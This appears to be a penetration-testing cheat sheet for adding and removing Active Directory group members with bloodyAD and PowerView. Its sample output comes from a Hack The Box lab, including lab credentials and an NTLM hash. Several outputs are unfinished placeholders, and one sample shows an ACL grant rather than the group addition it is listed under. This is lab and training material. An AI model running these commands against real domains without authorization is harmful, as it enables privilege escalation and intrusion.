Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Authentication Method
Add User to Group
1. Add User to Group
# Password
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> add groupMember '<GROUP>' '<TARGET_USER>'
Sample Output:
TO-DO# NTLM
bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> add groupMember '<GROUP>' '<TARGET_USER>'
Sample Output:
TO-DO# Password-based Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' -k --host <DC> add groupMember '<GROUP>' '<TARGET_USER>'
Sample Output:
TO-DO# NTLM-based Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -p '<HASH>' -f rc4 -k --host <DC> add groupMember '<GROUP>' '<TARGET_USER>'
Sample Output:
TO-DO# Ticket-based Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -k --host <DC> add groupMember '<GROUP>' '<TARGET_USER>'
Sample Output:
TO-DO2. Check
# Password
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> get object '<GROUP>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -p 'Password123!' --host dc01.haze.htb get object 'SUPPORT_SERVICES'
distinguishedName: CN=Support_Services,CN=Users,DC=haze,DC=htb
cn: Support_Services
dSCorePropagationData: 2025-10-31 22:42:14+00:00
groupType: -2147483646
instanceType: 4
member: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
---[SNIP]---
# NTLM
bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> get object '<GROUP>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 --host dc01.haze.htb get object 'SUPPORT_SERVICES'
distinguishedName: CN=Support_Services,CN=Users,DC=haze,DC=htb
cn: Support_Services
dSCorePropagationData: 2025-10-31 22:42:14+00:00
groupType: -2147483646
instanceType: 4
member: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
---[SNIP]---
# Password-based Kerberos
sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' -k --host <DC> get object '<GROUP>'
Sample Output:
$ sudo ntpdate -s 10.129.31.115 && bloodyAD -d haze.htb -u 'haze-it-backup$' -p 'Password123!' -k --host dc01.haze.htb get object 'SUPPORT_SERVICES'
distinguishedName: CN=Support_Services,CN=Users,DC=haze,DC=htb
cn: Support_Services
dSCorePropagationData: 2025-10-31 22:46:22+00:00
groupType: -2147483646
instanceType: 4
member: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
---[SNIP]---
# NTLM-based Kerberos
sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -p '<HASH>' -f rc4 -k --host <DC> get object '<GROUP>'
Sample Output:
$ sudo ntpdate -s 10.129.31.115 && bloodyAD -d haze.htb -u 'haze-it-backup$' -p '735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 -k --host dc01.haze.htb get object 'SUPPORT_SERVICES'
distinguishedName: CN=Support_Services,CN=Users,DC=haze,DC=htb
cn: Support_Services
dSCorePropagationData: 2025-10-31 22:46:22+00:00
groupType: -2147483646
instanceType: 4
member: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
---[SNIP]---
# Ticket-based Kerberos
sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -k --host <DC> get object '<GROUP>'
Sample Output:
$ sudo ntpdate -s 10.129.31.115 && bloodyAD -d haze.htb -u 'haze-it-backup$' -k --host dc01.haze.htb get object 'SUPPORT_SERVICES'
distinguishedName: CN=Support_Services,CN=Users,DC=haze,DC=htb
cn: Support_Services
dSCorePropagationData: 2025-10-31 22:46:22+00:00
groupType: -2147483646
instanceType: 4
member: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
---[SNIP]---
Ref: bloodyAD
1. Connect
# Password
powerview '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>'
Sample Output:
$ powerview 'haze.htb/haze-it-backup$:Password123!@DC01.haze.htb'
╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>]
╰─PV ❯
# NTLM
powerview '<DOMAIN>/<USER>@<TARGET>' -H '<HASH>'
Sample Output:
$ powerview 'haze.htb/haze-it-backup$@DC01.haze.htb' -H '735c02c6b2dc54c3c8c6891f55279ebc'
╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>]
╰─PV ❯
# Password-based Kerberos
powerview '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>' -k
Sample Output:
$ powerview 'haze.htb/haze-it-backup$:Password123!@DC01.haze.htb' -k
╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>]
╰─PV ❯
# NTLM-based Kerberos
powerview '<DOMAIN>/<USER>@<TARGET>' -H '<HASH>' -k
Sample Output:
$ powerview 'haze.htb/haze-it-backup$@DC01.haze.htb' -H '735c02c6b2dc54c3c8c6891f55279ebc' -k
╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>]
╰─PV ❯
# Ticket-based Kerberos
powerview '<DOMAIN>/<USER>@<TARGET>' -k
Sample Output:
$ powerview 'haze.htb/haze-it-backup$@DC01.haze.htb' -k --no-pass
╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>]
╰─PV ❯
2. Add User to Group
Add-DomainGroupMember -Identity '<GROUP>' -Members '<TARGET_USER>'
Sample Output:
╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>]
╰─PV ❯ Add-DomainObjectAcl -TargetIdentity 'SUPPORT_SERVICES' -PrincipalIdentity 'haze-it-backup$' -Rights fullcontrol
[2025-10-31 22:23:23] [Add-DomainObjectACL] Found target identity: CN=Support_Services,CN=Users,DC=haze,DC=htb
[2025-10-31 22:23:23] [Add-DomainObjectACL] Found principal identity: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
[2025-10-31 22:23:23] Adding FullControl to S-1-5-21-323145914-28650650-2368316563-1112
[2025-10-31 22:23:23] [Add-DomainObjectACL] Success! Added ACL to CN=Support_Services,CN=Users,DC=haze,DC=htb
3. Check
Get-DomainGroupMember -Identity '<GROUP>'
Sample Output:
╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>]
╰─PV ❯ Get-DomainGroupMember -Identity 'Support_Services'
GroupDomainName : Support_Services
GroupDistinguishedName : CN=Support_Services,CN=Users,DC=haze,DC=htb
MemberDomain : haze.htb
MemberName : Haze-IT-Backup$
MemberDistinguishedName : CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
MemberSID : S-1-5-21-323145914-28650650-2368316563-1111
Ref: powerview.py
1. Import PowerView
. .\PowerView.ps1
Sample Output:
evil-winrm-py PS C:\programdata> . .\PowerView.ps1
2. Add User to the Group
Add-DomainGroupMember -Identity '<GROUP>' -Members '<USER>'
Sample Output:
evil-winrm-py PS C:\programdata> Add-DomainGroupMember -Identity 'SUPPORT_SERVICES' -Members 'haze-it-backup$'
4. Check
Get-DomainGroupMember -Identity '<GROUP>' -Domain <DOMAIN> -DomainController <DC> | fl MemberName
Sample Output:
evil-winrm-py PS C:\programdata> Get-DomainGroupMember -Identity 'SUPPORT_SERVICES' -Domain haze.htb -DomainController dc01.haze.htb | fl MemberName
MemberName : Haze-IT-Backup$
Remove User from Group
# Password
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> remove groupMember '<GROUP>' '<TARGET_USER>'
Sample Output:
TO-DO# NTLM
bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> remove groupMember '<GROUP>' '<TARGET_USER>'
Sample Output:
TO-DO# Password-based Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' -k --host <DC> remove groupMember '<GROUP>' '<TARGET_USER>'
Sample Output:
TO-DO# NTLM-based Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -p '<HASH>' -f rc4 -k --host <DC> remove groupMember '<GROUP>' '<TARGET_USER>'
Sample Output:
TO-DO# Ticket-based Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -k --host <DC> remove groupMember '<GROUP>' '<TARGET_USER>'
Sample Output:
TO-DORemove-DomainGroupMember -Identity '<GROUP>' -Members '<TARGET_USER>'
Sample Output:
╭─LDAPS─[dc01.haze.htb]─[HAZE\Administrator]-[NS:<auto>]
╰─PV ❯ Remove-DomainGroupMember -Identity 'SUPPORT_SERVICES' -Members 'haze-it-backup$'
[2025-11-01 01:07:02] User haze-it-backup$ successfully removed from SUPPORT_SERVICES
1. Import PowerView.ps1
. .\PowerView.ps1
Sample Output:
TO-DO2. Remove User from Group
Remove-DomainGroupMember -Identity '<GROUP>' -Members '<TARGET_USER>'
Sample Output:
evil-winrm-py PS C:\programdata> Remove-DomainGroupMember -Identity 'SUPPORT_SERVICES' -Members 'haze-it-backup$'
True